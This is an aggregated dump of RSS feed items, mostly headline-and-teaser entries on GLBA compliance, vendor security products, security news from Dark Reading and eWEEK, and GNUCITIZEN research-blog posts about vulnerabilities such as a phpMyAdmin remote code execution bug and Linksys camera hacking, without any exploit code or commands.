http://www.compliancehome.com/rss/resources-GLBA.xml On November 17, 2009, the Federal Trade Commission (FTC), along with other federal regulators (Federal Deposit Insurance Corporation, Federal Reserve Board, Office of the Comptroller of the Currency, Office of Thrift Supervision, National Credit Union Administration, Commodity Futures Trading Commission, and Securities and Exchange Commission, collectively referred to as the Agencies), adopted final Model Privacy Notice forms for compliance with the Gramm-Leach-Bliley Act (GLBA) and its implementing regulation, the FTC's Financial Privacy Rule. The Model Privacy Notice replaces the Sample Clauses, which appear in Appendix B to the Privacy Rule, and as such now provides the safe harbor for compliance.

==> Cloud Computing Backup? Significant Questions

http://www.compliancehome.com/rss/resources-GLBA.xml The quick evolution and maturity of cloud storage providers creates a new opportunity for managed service providers to offer cloud backup services. Backup to the cloud can provide a compelling cost advantage for SMB and SME customers and it opens up a new model for VARs and MSPs to profit with cloud-based backup services.

==> Effective Workflow for Fixing Network Vulnerabilities & Policy Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml This webcast outlines the eight workflow processes that make up an effective vulnerability management solution for ensuring security and documenting compliance. Discover how the right software-as-a-service (SaaS) solution automates these processes for fast, cost-effective remediation and policy compliance. View this webcast to learn about an effective remediation plan that provides continuous protection from network vulnerabilities and helps with compliance with regulations such as PCI, GLBA and HIPAA.

==> New Degausser Introduced by SEM

http://www.compliancehome.com/rss/resources-GLBA.xml The Model EMP001 Eliminator Hard Drive and Magnetic Tape Degausser is being introduced by Security Engineered Machinery, its most recent product for degaussing hard drives. The electromagnetic-pulse degausser permanently erases data from computer hard drives, data tapes, and other magnetic media. The EMP001 is on the U.S. National Security Agency's Evaluated Products List, complies with Department of Defense requirements for destroying classified information on magnetic media, and exceeds the requirements of many national and international legislative mandates (FACTA, HIPAA, GLB, DPA, etc.) for the destruction of confidential/sensitive data.

==> Is Compliance in the Cloud Achievable

http://www.compliancehome.com/rss/resources-GLBA.xml There is no doubt that cloud computing is dominating today's IT conversation among C-level security executives. Whether it's due to the compelling cost saving possibilities in a tough economy, or because of perceived advantages in provisioning flexibility, auto-scaling, and on-demand computing, CSOs are probing the capabilities, costs and restrictions of the cloud. At the same time, security and compliance concerns are at the forefront of issues potentially holding large enterprises back from capitalizing on the benefits that cloud computing has to offer.

==> Harmonizing Controls to Reduce Your Cost of Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Mounting regulations across the globe have increased the cost and burden on organizations. The high cost is especially felt by organizations which must adhere to multiple requirements - 75 percent of organizations must comply with two or more regulations and corresponding audits and more than 40 percent must comply with three or more regulations.

==> Federal and State Data Regulations Not to be Overlooked

http://www.compliancehome.com/rss/resources-GLBA.xml Tracking new regulations and compliance rulings from federal and state government can be dizzying; they include FRCP, HIPAA, GLB, and more. But now more than ever, the government expects all businesses to comply, not just large corporations. Today, every company is responsible for its data and for securing its customers' information, no matter how much it costs to do so. In today's litigious business world, the possibility of being dragged into a lawsuit is very real, and if that happens, you will likely need to make your information available to the process. And woe to the company that cannot comply with basic regulations, because a judge will not accept that you thought those requirements applied only to the big companies.

==> Trailing Ground: Gramm-Leach-Bliley and the Future of Banking

http://www.compliancehome.com/rss/resources-GLBA.xml The debate in Washington over financial regulation has probably puzzled most observers with its references to the GLBA as a cause of the financial crisis. At the time of its adoption, the GLBA was hailed as a forward-looking effort to bring new flexibility and change to the banking industry. As described by John LaFalce, then the ranking Democrat on the House Financial Services Committee,

==> Payment System Product Codes to be Evaluated by PCATS

http://www.compliancehome.com/rss/resources-GLBA.xml A survey to identify the use of PCATS payment product codes within the convenience store industry has been created by the Petroleum Convenience Alliance for Technology Standards (PCATS). In addition to measuring the number of merchant fueling locations that have implemented PCATS standard payment product codes at their point of sale (POS), the survey may also help identify additional items that need to be added to the current industry code list.

==> IBM's Acquisition of Guardium Created a Buzz in the Security Market

http://www.compliancehome.com/rss/resources-GLBA.xml IBM's acquisition of database activity monitoring (DAM) vendor Guardium has created a lot of buzz in the security industry. This is the first major acquisition in the database security market, the first time a large company has bet on DAM technology, and if the rumored sales price is accurate, then it suggests IBM paid a premium. And given the value this product can provide to IBM customers, it looks like a good investment.

==> A Combined Security Solution for Governance Portal

http://www.compliancehome.com/rss/resources-GLBA.xml A worldwide business consulting and internal audit firm, Protiviti Inc., has introduced the first product in its new Governance Portal for Information Technology series. The product is a security solution directed at mitigating data security risks and avoiding costly data breaches and reputation damage.

==> Analyst Webinar on Risk and Compliance Management: Learning from Leaders and Steps You Can Take

http://www.compliancehome.com/rss/resources-GLBA.xml Join Forrester Research analyst Chris McClean to learn what leading companies are doing for effective risk and compliance management and what steps you can take today. Risk managers in all industries are grappling with the problems of performing real-time risk measurement and mitigation, and stringent compliance and regulatory requirements such as SOX, FCPA, HIPAA, AML, GLBA, FERC, NERC and many more add a further layer of challenges. As a result, companies are looking to systematically identify, measure, prioritize and respond to all types of risk in the business, while ensuring compliance with federal and state regulations.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email- and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; and implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Satellite Technology Used by Glacier Bay National Park Rangers to Help Tousled Whales

http://www.compliancehome.com/rss/resources-GLBA.xml Rangers in Glacier Bay National Park respond not only to human visitors in trouble, but also to marine life that need help. A recent case of a humpback whale that became entangled in a polyester line demonstrates not only the quick response of park rangers, but also how satellite technology can play a role in saving whales.

==> 'Managing the Cloud: Are You Comfortable with Where Your Data Sleeps at Night?'

http://www.compliancehome.com/rss/resources-GLBA.xml Why is cloud computing relevant today from an economic, business and technology standpoint? What are some potential benefits and pitfalls of moving to the cloud? What should you look for in a cloud computing provider to ensure the security of your data and applications? In an October 8 interview from Times Square, Sam Gross, vice president, Global Information Technology Outsourcing Solutions, Unisys Corporation, will answer these questions and more. Sam will talk about how the economy is accelerating a tectonic shift in IT and how it supports the business. He will also discuss how to transform a traditional data center that is inflexible and costly into a cloud computing environment that is secure, virtualized and automated, and that requires less investment.

==> Sipera Secure Live Communications Mobility System Made Available by Sipera Systems

http://www.compliancehome.com/rss/resources-GLBA.xml Sipera SLiC offers business-ready smartphone VoIP and unified communications (UC). This latest offering delivers enterprise-class communications privacy and security for VoIP and UC on smartphones. Additionally, the company's system enables smartphone VoIP to include smart-card authentication for accessing enterprise resources. Company officials said that this provides unparalleled access control and communications privacy.

==> The Wonderful Triangle of IT Security

http://www.compliancehome.com/rss/resources-GLBA.xml The myths of the CIA triad. Have you ever considered taking a role as the most senior person for information security at a large corporation? Then you must be prepared to understand the key principles of information security, and how they really apply to life and business.

==> Sensitive Data to be Sealed by Solid Wireless Security Policies (Part 3)

http://www.compliancehome.com/rss/resources-GLBA.xml With smartphones gaining traction in the consumer world, it's easy to forget that handsets are simply mini computers that could contain sensitive data about business contacts and inter-office electronic communication. In addition to putting in place a procurement policy that includes checks and balances for who gets what type of wireless device and plan, as well as a usage policy to make sure employees aren't overusing mobile services for personal use, implementing a solid security policy is also essential, said Pankaj "PJ" Gupta, founder and CEO of Amtel, a company that helps enterprises rein in wireless management expenses and improve productivity.

==> Updated AMU Kit Offered to FaceTime's Unified Security Gateway 3.0

http://www.compliancehome.com/rss/resources-GLBA.xml FaceTime Communications, a purveyor of applications designed to promote the secure use of Web 2.0 and unified communications in the commercial segment, announced the commercial launch of its Augment, Migrate and Update, or AMU, kit. The kit is devised for enterprises that are on the brink of expensive upgrades needed to maintain compliance with enterprise security and control standards, which are essential to manage the changing face of the Internet.

==> Former Chairman of the Federal Reserve Wants to Bring Back 1933 Glass-Steagall Act

http://www.compliancehome.com/rss/resources-GLBA.xml Paul Volcker, the former Chairman of the Federal Reserve [1979-1987], has advised the Obama Administration to bring back the 1933 Glass-Steagall Act [SGA]. The Glass-Steagall Act was repealed in 1999 and replaced with the Gramm-Leach-Bliley Act [GLBA]. The GLBA removed restrictions on commercial banks and investment banks, allowing them gross latitude in activities and services. (Reem Heakel, 2009)

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution - Vendor Webcast

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. View this webcast for an overview of each regulation. Also, gain an understanding of the capabilities an organization must have in place to address these requirements.

==> Data Security Should Be Ensured by the Strategy

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past few years, with the rise in incidents of identity theft, many organizations are rightfully concerned about keeping their customers' data private. While the financial services industry has been regulated since the late '90s by the federal government, other companies would be wise to follow its lead. For some years now, financial services companies have had to comply with the provisions of the oft-maligned Gramm-Leach-Bliley Act. Among other things, GLBA calls for a process that begins with an assessment of an organization's information systems, followed by development of a security strategy, implementation of the strategy and, finally, ongoing monitoring.

==> FDA's Growing Role Regulating Health 2.0, Health IT

http://www.compliancehome.com/rss/resources-GLBA.xml That federal regulation is part of the deal is well known to many who are involved in the world of health IT. Issues of health information privacy have been subject to an array of federal and state laws for decades. HIPAA, the Federal Privacy Act, laws governing Medicaid, Medicare, the Veterans Health Administration, funds used for the treatment of mental illness, sexually transmitted infections, and on and on, all have privacy provisions. There is a similar regulatory scheme for data security, again including HIPAA, the Gramm-Leach-Bliley Act and other laws.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, it's for public companies to guarantee accurate financial accounting. GLBA protects the personal financial information of an organization's customers. And HIPAA protects and guarantees the privacy of an individual's personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Severance of Duties in Virtualized Environments

http://www.compliancehome.com/rss/resources-GLBA.xml With Virtualization we have moved a step closer to the world of Star Trek. Think back to episodes of The Next Generation where Geordi was able to control the functions of the entire ship through a single touch-screen interface. He was able to reconfigure electrical, mechanical and propulsion systems without needing anyone else or additional authorization. The only thing to prevent him from doing something risky or damaging was the computer system itself.

==> Availability of OfficeScreen Complete Announced by ANXeBusiness Corp.

http://www.compliancehome.com/rss/resources-GLBA.xml A leading provider of networking and security managed services, ANXeBusiness Corp., announced the availability of OfficeScreen Complete, a fully managed security solution providing comprehensive protection from web-based threats, advanced remote access capabilities, and productivity enhancement tools. Built upon two powerful security technologies - ANX OfficeScreen and ANX PositivePro - OfficeScreen Complete combines an award-winning managed firewall, site-to-site VPN, URL filtering, and remote access technology into one hosted solution. Additionally, when supporting five or more users, OfficeScreen Complete can also include wireless access point security, traffic shaping, and Internet failover support.

==> Bank compliance laws need to be streamlined to really help consumers

http://www.compliancehome.com/rss/resources-GLBA.xml In today's environment, banks must devote a huge amount of time and resources, at great expense, to keeping up with the never-ending cascade of new laws and regulations and keeping in compliance with the myriad existing ones. Before Congress enacts legislation implementing the part of the administration's regulatory reform proposal that calls for the establishment of a new Consumer Financial Protection Agency, it should take a close look at the compliance burdens already heaped upon banks.

==> Vital Information Security and Compliance Activities for 2010

http://www.compliancehome.com/rss/resources-GLBA.xml It has always been a challenge for businesses and organizations of all sizes to manage the security of critical information. Even companies that invest in the latest security infrastructure and tools soon discover that these technology-based solutions are short-lived.

==> Data Loss Prevention not a solution

http://www.compliancehome.com/rss/resources-GLBA.xml One of the powerful tools that many organizations are using to prevent the unauthorized copying or transmission of confidential or personal data is Data Loss Prevention (DLP). Organizations spend a tremendous amount of money and time to set up firewalls and intrusion detection solutions to prevent attackers from the outside from gaining access to internal assets. However, what about the internal threat? A Web page, an e-mail with a client list, or personal data copied to a USB drive are all examples of data that can leave an organization unmonitored and undetected.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join this webinar to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email- and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; and implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Real-Life Log Management Challenges for Financial Institutions

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Email Security and Archiving - Clearer in the Cloud

http://www.compliancehome.com/rss/resources-GLBA.xml The time is NOW for businesses and organizations of all sizes to implement cloud computing solutions for email security and archiving. Cloud computing solutions are more effective than traditional, on-premise solutions, and at a fraction of the cost and IT resource requirements. Listen to this live TechRepublic Webcast, moderated by Steve Kovsky and featuring special guests Michael Osterman, President of Osterman Research, and Adam Swidler of Google. They present findings from the latest research comparing cloud solutions with on-premise solutions.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes; go beyond intrusion detection and prevention to a positive, proactive security model that protects against new email- and web-borne attacks; safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information; and implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations.

==> Generating grounds for identity theft

http://www.compliancehome.com/rss/resources-GLBA.xml The federal GLBA, HIPAA, FACTA and its Red Flags and Disposal Rules, state data breach notification laws, and hundreds of other federal and state laws and industry regulations like PCI-DSS are intended to protect the privacy and security of consumers' personally identifiable and financial information entrusted to businesses and other organizations. Many such regulations aim to prevent identity theft and privacy violations.

==> The Price of Not Complying With GLBA

http://www.compliancehome.com/rss/resources-GLBA.xml The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to create and maintain an information security program to protect customer information. This webcast highlights GLBA and its technology safeguards, the price of not complying, how to identify technology compliance areas, compliance policy and process (who implements it and how), and Tripwire GLBA product and service offerings.

==> SAS 70 Certification Completed by CRG West

http://www.compliancehome.com/rss/resources-GLBA.xml CRG West, a developer, manager and operator of data centers, has completed SAS 70 Type II certification at the company's Boston and Chicago data centers. The company believes the completion of this certification process in Boston and Chicago has made the outsourced data center selection process more efficient for prospective customers from all industries.

==> CIO Strategies for Retention and Deletion of Email and Electronic Information

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past two years, major changes to the Federal Rules of Civil Procedure (FRCP) and the increase in state and federal compliance regulations have created new challenges for companies as they struggle to manage email retention and deletion policies. To successfully maintain compliance and protect their business in the event of litigation, companies must understand these changes. Implementing new strategies for email will enable organizations to effectively set and manage email retention and deletion policies, as well as provide robust search and e-Discovery capabilities to respond rapidly to litigation.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Using Email Encryption to Enforce Security Policies for PCI, GLBA & HIPAA Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Ensuring your organization complies with today's increasingly complex regulations and industry mandates around email and data security can be both a legal and a technical minefield. First you need to understand what data should be protected. Then you need to determine who in your organization has access to that data and is sending it to people outside of the organization. You also need to invest in technology to enforce your compliance policies. It can be intimidating for any IT department. Hearing how your peers have tackled these challenges can help you plan your approach to finding a solution. Watch the webinar,

==> Email is Critical...and Out of Control!

http://www.compliancehome.com/rss/resources-GLBA.xml More than 75% of the average company's intellectual property is contained in email messages and their attachments. As a result, email has quickly become the file server of choice for most of us - and a headache for compliance managers. The value of unified information access to live and archived email via desktop or mobile device is becoming increasingly important for today's businesses - from end users to the board room, where compliance is an ongoing pain point.

==> The Top 10 Benefits of SaaS-enabled Email Management

http://www.compliancehome.com/rss/resources-GLBA.xml Email is indisputably the most important business application for most organizations. Yet, managing it has always been a no-win proposition. Add the pressure of fewer people and resources as well as shrinking budgets these days, and it seems that the pain of managing email can only get worse. But don't despair, there's a new breed of managed SaaS-enabled email services that are modular, reliable, and secure for virtually any type of business.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Top Mobile Vulnerabilities And Exploits Of 2012

http://www.darkreading.com/rss/all.xml Spoofing, banking attacks, authentication flaws, and more top the list of 2012's biggest mobile security headaches

==> New Cyberespionage Attack Targets Russia

http://www.darkreading.com/rss/all.xml 'Sanny' attacks feature Korea as possible home to command-and-control

==> Slide Show: 10 Security-Service Startups To Remember In 2012

http://www.darkreading.com/rss/all.xml With the security services market growing by more than 23 percent per year, it's no wonder that 2012 had its share of startup launches and young companies taking off

==> 'Dexter' Directly Attacks Point-of-Sale Systems

http://www.darkreading.com/rss/all.xml Attackers employ custom malware rather than physical skimmers to steal payment card information from PoS systems in 40 countries

==> Hauling That 50lb Sack of Compliance

http://www.darkreading.com/rss/all.xml Done wrong, your compliance efforts can needlessly weigh your team down

==> Six Steps To A Risk-Based Security Strategy

http://www.darkreading.com/rss/all.xml Developing a risk-based approach to IT security defense can be complicated. Here are some tips to help you navigate the maze

==> Team Ghostshell Hackers Claim NASA, Interpol, Pentagon Breaches

http://www.darkreading.com/rss/all.xml Hacking group Team Ghostshell Monday announced its latest string of exploits, as well as the release of 1.6 million accounts and records gathered as part of what it has dubbed Project WhiteFox. The hacked organizations allegedly include everyone from the European Space Agency (ESA) and the Japan Aerospace Exploration Agency (JAXA), to the Department of Defense and defense contractor L-3 Communications. "'Kay, let's get this party started! ESA, NASA, Pentagon, Federal Reserve, Interpol, FBI try to keep up from here on out because it's about to get interesting," said the group in a Pastebin post, making reference to some of the organizations with servers it claimed to have hacked. The resulting data that was copied and released by Team Ghostshell, and which largely appears to be in the form of server database tables, spans over 140 separate uploads -- all mirrored to multiple sites. Seventeen of those uploads relate to data grabs allegedly obtained from the Credit Union National Association (CUNA), which bills itself as "the premier national trade association serving credit unions." Team Ghostshell said the related data dump puts "over 85 mil. people at risk," while noting that "we've keep (sic) the leak to as little as possible." As of press time, CUNA's website was offline.

==> The Most Important IAM Question: Who Does This?

http://www.darkreading.com/rss/all.xml IAM projects get so wound up around tooling and processes that critical organizational questions go unanswered

==> IBM: Security Impedes Adoption Of Some Major Technologies

http://www.darkreading.com/rss/all.xml IT pros in new survey see security as hurdle in business analytics, mobile, social business, and cloud

==> What Is Big Data?

http://www.darkreading.com/rss/all.xml Big data is not about buying more big iron

==> Tech Insight: 5 Myths Of Software Security

http://www.darkreading.com/rss/all.xml Why do vulnerabilities keep cropping up in software? Here are five reasons -- and what developers can do about them

==> (ISC)2 Election Puts New Blood On Its Board Of Directors

http://www.darkreading.com/rss/all.xml The security certification group has faced criticism from its members regarding the CISSP certification

==> Slide Show: Top 10 Malware Advances In 2012

http://www.darkreading.com/rss/all.xml Blackhole's business model, Flashback's Mac fetish, ransomware's resurgence with Reveton, and Gauss' ability to guard against analysis among the game-changers this year

==> Most Healthcare Organizations Suffered Data Breaches

http://www.darkreading.com/rss/all.xml Data breach problems contagious among U.S. healthcare organizations, new reports show

==> 'Eurograbber' Lets Attackers Steal 36 Million Euros From Banks, Customers

http://www.darkreading.com/rss/all.xml Cybercriminals combine new Trojan with SMS malware to crack online banking systems

==> 5 Steps For Good Database Hygiene

http://www.darkreading.com/rss/all.xml Reduce risk to data through these database and Web app good 'grooming' habits

==> Attack Intelligence-Sharing Goes 'Wire-Speed'

http://www.darkreading.com/rss/all.xml STIX standard aimed at eliminating manual process of converting intelligence into useful defense

==> Stepping Up SMB Security

http://www.darkreading.com/rss/all.xml When your company is the third-party vendor, improved security practices, transparency and independent reviews to prove your claims can go a long way toward winning enterprises embattled by attacks and the burden of compliance

==> Android Riskier Than PCs: Sophos Security Threat Report 2013

http://www.darkreading.com/rss/all.xml Acceleration of BYOD and cloud, challenges caused by ransomware, continued threats coming from Blackhole, and what to expect in 2013

==> bleep Increasingly Targeted For Identity Fraud, Study Says

http://www.darkreading.com/rss/all.xml One in 40 families experience theft of personal data from a minor; lower-income families disproportionately affected

==> 'Gameover Zeus' Gang Launches New Attacks

http://www.darkreading.com/rss/all.xml Campaign includes rigged emails spoofing major U.S. banks and offering 'secure email' exchange with banking customers

==> Survey: IT Less Stressed About Cloud Security

http://www.darkreading.com/rss/all.xml Four out of five IT pros say they are using public cloud services, CloudPassage data finds

==> Twitter Users Vulnerable To SMS Spoofing Attack

http://www.darkreading.com/rss/all.xml Twitter users are vulnerable to an attack that would allow anyone to post messages to their Twitter feed or alter their account settings, provided the attacker knew the mobile phone number associated with the targeted user's account. "Messages can then be sent to Twitter with the source number spoofed," according to a blog post from security researcher Jonathan Rudenberg, who discovered the vulnerability. "Like email, the originating address of a SMS cannot be trusted. Many SMS gateways allow the originating address of a message to be set to an arbitrary identifier, including someone else's number." "Users of Twitter that have a mobile number associated with their account and have not set a PIN code are vulnerable," he said. Attackers would have full access to all Twitter SMS commands, including the ability to post tweets, reply to tweets, retweet messages, send direct messages to other Twitter users, and change the name and URL associated with a public profile.

==> 10 Nations Facing the Most Pervasive Threats From Malware, Botnets

http://www.eweek.com/rss-feeds-45.xml A look at the latest report from antivirus firm Sophos underscores the dangers of not treating Internet security at a national level.

==> Facebook User Policy Vote Ends With a Whimper

http://www.eweek.com/rss-feeds-45.xml Though some 668,000 users voted, it was nowhere near the 300 million votes that were needed to keep user policies as they are.

==> Cloud Security Will Overtake On-Premise Systems in Three Years: Gartner

http://www.eweek.com/rss-feeds-45.xml By 2015, 10 percent of overall IT security enterprise product capabilities will be delivered in the cloud, according to Gartner market research.

==> DataMotion Announces SecureMail Gateway Email Encryption

http://www.eweek.com/rss-feeds-45.xml The platform includes three types of outbound mail filtering and offers a host of features designed to improve email encryption.

==> Identity Theft Is a Growing Risk in Health Care: Ponemon Report

http://www.eweek.com/rss-feeds-45.xml Identity theft is more rampant in health care than any other U.S. industry, according to the Ponemon Institute's third-annual report on patient privacy and data security.

==> Spear-Phishing Emails Now Favorite Tactic for Advanced Malware Threats

http://www.eweek.com/rss-feeds-45.xml More than 90 percent of the targeted attacks detected by Trend Micro between February and September 2012 involved spear-phishing tactics, researchers say.

==> Syria Outage Sheds Light on U.S. ‘Kill Switch’ Concerns

http://www.eweek.com/rss-feeds-45.xml Networks in Syria and 60 other countries could be taken down with a few phone calls, but most western nations, including the U.S., are a different matter.

==> Cyber-Disaster a 'Whisker Away' in RSA CEO's 2013 Security Forecast

http://www.eweek.com/rss-feeds-45.xml Here are RSA Security CEO Art Coviello's predictions for 2013 in the world of IT security.

==> Cyber-Criminals Ramp Up Intimidation in Ransomware Scams

http://www.eweek.com/rss-feeds-45.xml Cyber-criminals are dropping the name of the Internet Crime Complaint Center in their ransomware scams to intimidate victims into paying up by making them fear they'll get ensnared in a federal investigation.

==> JavaScript Virus Spreads Racist Message Through Tumblr Blogging Site

http://www.eweek.com/rss-feeds-45.xml The Tumblr blogging service halts posting for a short period to allow its engineers to clean up a fast-spreading JavaScript virus.

==> Shylock Malware Detects VMs to Evade Analysis

http://www.eweek.com/rss-feeds-45.xml The banking Trojan gains a new trick: The ability to detect virtual machines controlled using remote sessions, a common configuration for researchers.

==> 10 Reasons Enterprises Should Rethink Endpoint Security

http://www.eweek.com/rss-feeds-45.xml eWEEK and Tal Klein, senior director of products at Bromium, offer a slide show on protecting against attacks at the endpoint.

==> You and Your Research

http://www.gnucitizen.org/feed/ This is really one of my favourite talks from this year's HITB in KL. @haroonmeer did an exceptional job at describing what it takes to produce an exceptional piece of work/research and the various pitfalls and sacrifices one needs to make.

==> Well Websecurify Runs on The iPhone

http://www.gnucitizen.org/feed/ This is not necessarily news anymore since it was discussed on the Websecurify official blog but we are so excited about it that we could not hold ourselves from posting it here too. The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. [...]

==> Stuxnet

http://www.gnucitizen.org/feed/ I have been avoiding the topic about Stuxnet for quite some time, mainly because there were many others who spent the time to take the virus apart. However, here is a video, which I find rather amusing: Whether this is the real deal or simply fear mongering, I simply don't know. It is all speculation at the moment. [...]

==> Having fun with BeEF, the browser exploitation framework

http://www.gnucitizen.org/feed/ We haven't featured any guest bloggers in a while, but we're glad to be featuring Christian Frichot this month! Christian is a security professional based in Perth, Western Australia. He's currently working in the finance industry as part of a tight-knit internal team of security consultants doing their best to protect their business and customers from technical threats such as malware or insecure web applications. [...]

==> ColdFusion directory traversal FAQ (CVE-2010-2861)

http://www.gnucitizen.org/feed/ A new Adobe hotfix for ColdFusion has been released recently. The vulnerability, which was discovered by Richard Brain, was rated as important by Adobe and could affect a large number of Internet-facing web servers. The FAQ below is meant to shed some light on this vulnerability so that ColdFusion administrators can understand what they're up against. [...]

==> 1ST European Edition of HITB Coming Up!

http://www.gnucitizen.org/feed/ In case you haven’t heard yet, HITBSecConf is hosting the first European Edition of their conference in Amsterdam during 1st-2nd July ’10. The history of the HITB conferences can be traced back to 2002, the year in which the first ever edition of HITB took place in Malaysia. Since then, HITB has grown to become the biggest technical computer security event in Asia and has extended their presence to the Middle East and now Europe. [...]

==> Hacking Linksys IP Cameras (pt 6)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: here, here, here, here and here. As we know, there are several ways one could go about hunting for IP cameras on the net. The slowest way would be to portscan random IP addresses for certain ports and programmatically detect if the web interface of a given camera was available on the open ports found. [...]

==> Dnsmap v0.30 is now out!

http://www.gnucitizen.org/feed/ After working on dnsmap for a few months whenever time allowed, I decided there were enough additional goodies to make version 0.30 a new public release. Let me just say that a lot of the bugs that have been fixed, and features that have been added to this version would not be possible without the feedback from great folks such as Borys Lacki (www.bothunters.pl), Philipp Winter (7c0.org) and meathive (kinqpinz.info). Thanks guys, your feedback was highly valuable to me. [...]

==> Old-school Remote Command Exec Vulnerabilities on Avaya Intuity

http://www.gnucitizen.org/feed/ Remember those old remote command exec vulns where you had a CGI script such as a perl program which would take input from the client to construct command strings that would then be passed to the shell environment? Well, there were tons of those affecting diagnostic scripts available on the web interface of Avaya Intuity Audix LX. These vulnerabilities, although cool, are not critical since you need to be logged into the interface in order to exploit them. [...]

==> Skydive

http://www.gnucitizen.org/feed/ What is the best way to spend a quiet, weekend afternoon? – Jump off a perfectly working plane while 10,000 feet in the air. On 5th of July 2009, the GNUCITIZEN team and friends came together to perform a skydiving gig. [...]

==> Free Web Application Security Testing Tool

http://www.gnucitizen.org/feed/ Automated Web Application Security Testing tools are at the core of modern penetration testing practices. You cannot rely 100% on the results they produce without seriously considering their limitations. However, because these tools are so good at picking the low-hanging fruit by employing force and repetition, they still have a place in our arsenal of penetration testing equipment. These tools are not unfamiliar to modern day penetration testers. [...]

==> Of Sec Cons and Magstripe Gift Cards

http://www.gnucitizen.org/feed/ I've been meaning to talk about CONFidence and EUSecWest for quite a while, but May was such an intense month for me that it hardly left me with any time for other things. I eventually got caught up with other matters, which resulted in me publishing this post about 2 months late. I've been researching, pentesting, and preparing two different presentations which I gave at CONFidence in Krakow, and EUSecWest in London. pdp has also been busy presenting at AusCERT2009. [...]

==> CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

http://www.gnucitizen.org/feed/ I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow). [...]

==> Hacking Linksys IP Cameras (pt 5)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4). Mounting the filesystem on your workstation There are many ways to mount the camera’s filesystem using the firmware binary. In this post, we’ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model. [...]

==> Breaking Into a Home With an iPhone

http://www.gnucitizen.org/feed/ This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch. Got the idea? No? Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. [...]

==> Extensions at War

http://www.gnucitizen.org/feed/ Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don’t know why. [...]

==> Exploit Sweatshop

http://www.gnucitizen.org/feed/ When I was playing with/introducing the partial disclosure practice a year and something ago, I did get contacted by numerous dodgy characters willing to buy as yet undisclosed vulnerabilities for substantial amounts of money. Of course, requests of that nature were kindly ignored. I couldn't believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce. [...]

==> Jeriko Group and Source Code Repository

http://www.gnucitizen.org/feed/ Jeriko moved into its own source code repository, which you will be able to find here. There is also a discussion group here, if you feel like using it. The version inside the new code repository is very different from the version you've seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (a wrapper around bash) which does the heavy lifting and also introduces some funky programming mechanisms. [...]

==> Hacking Linksys IP Cameras (pt 4)

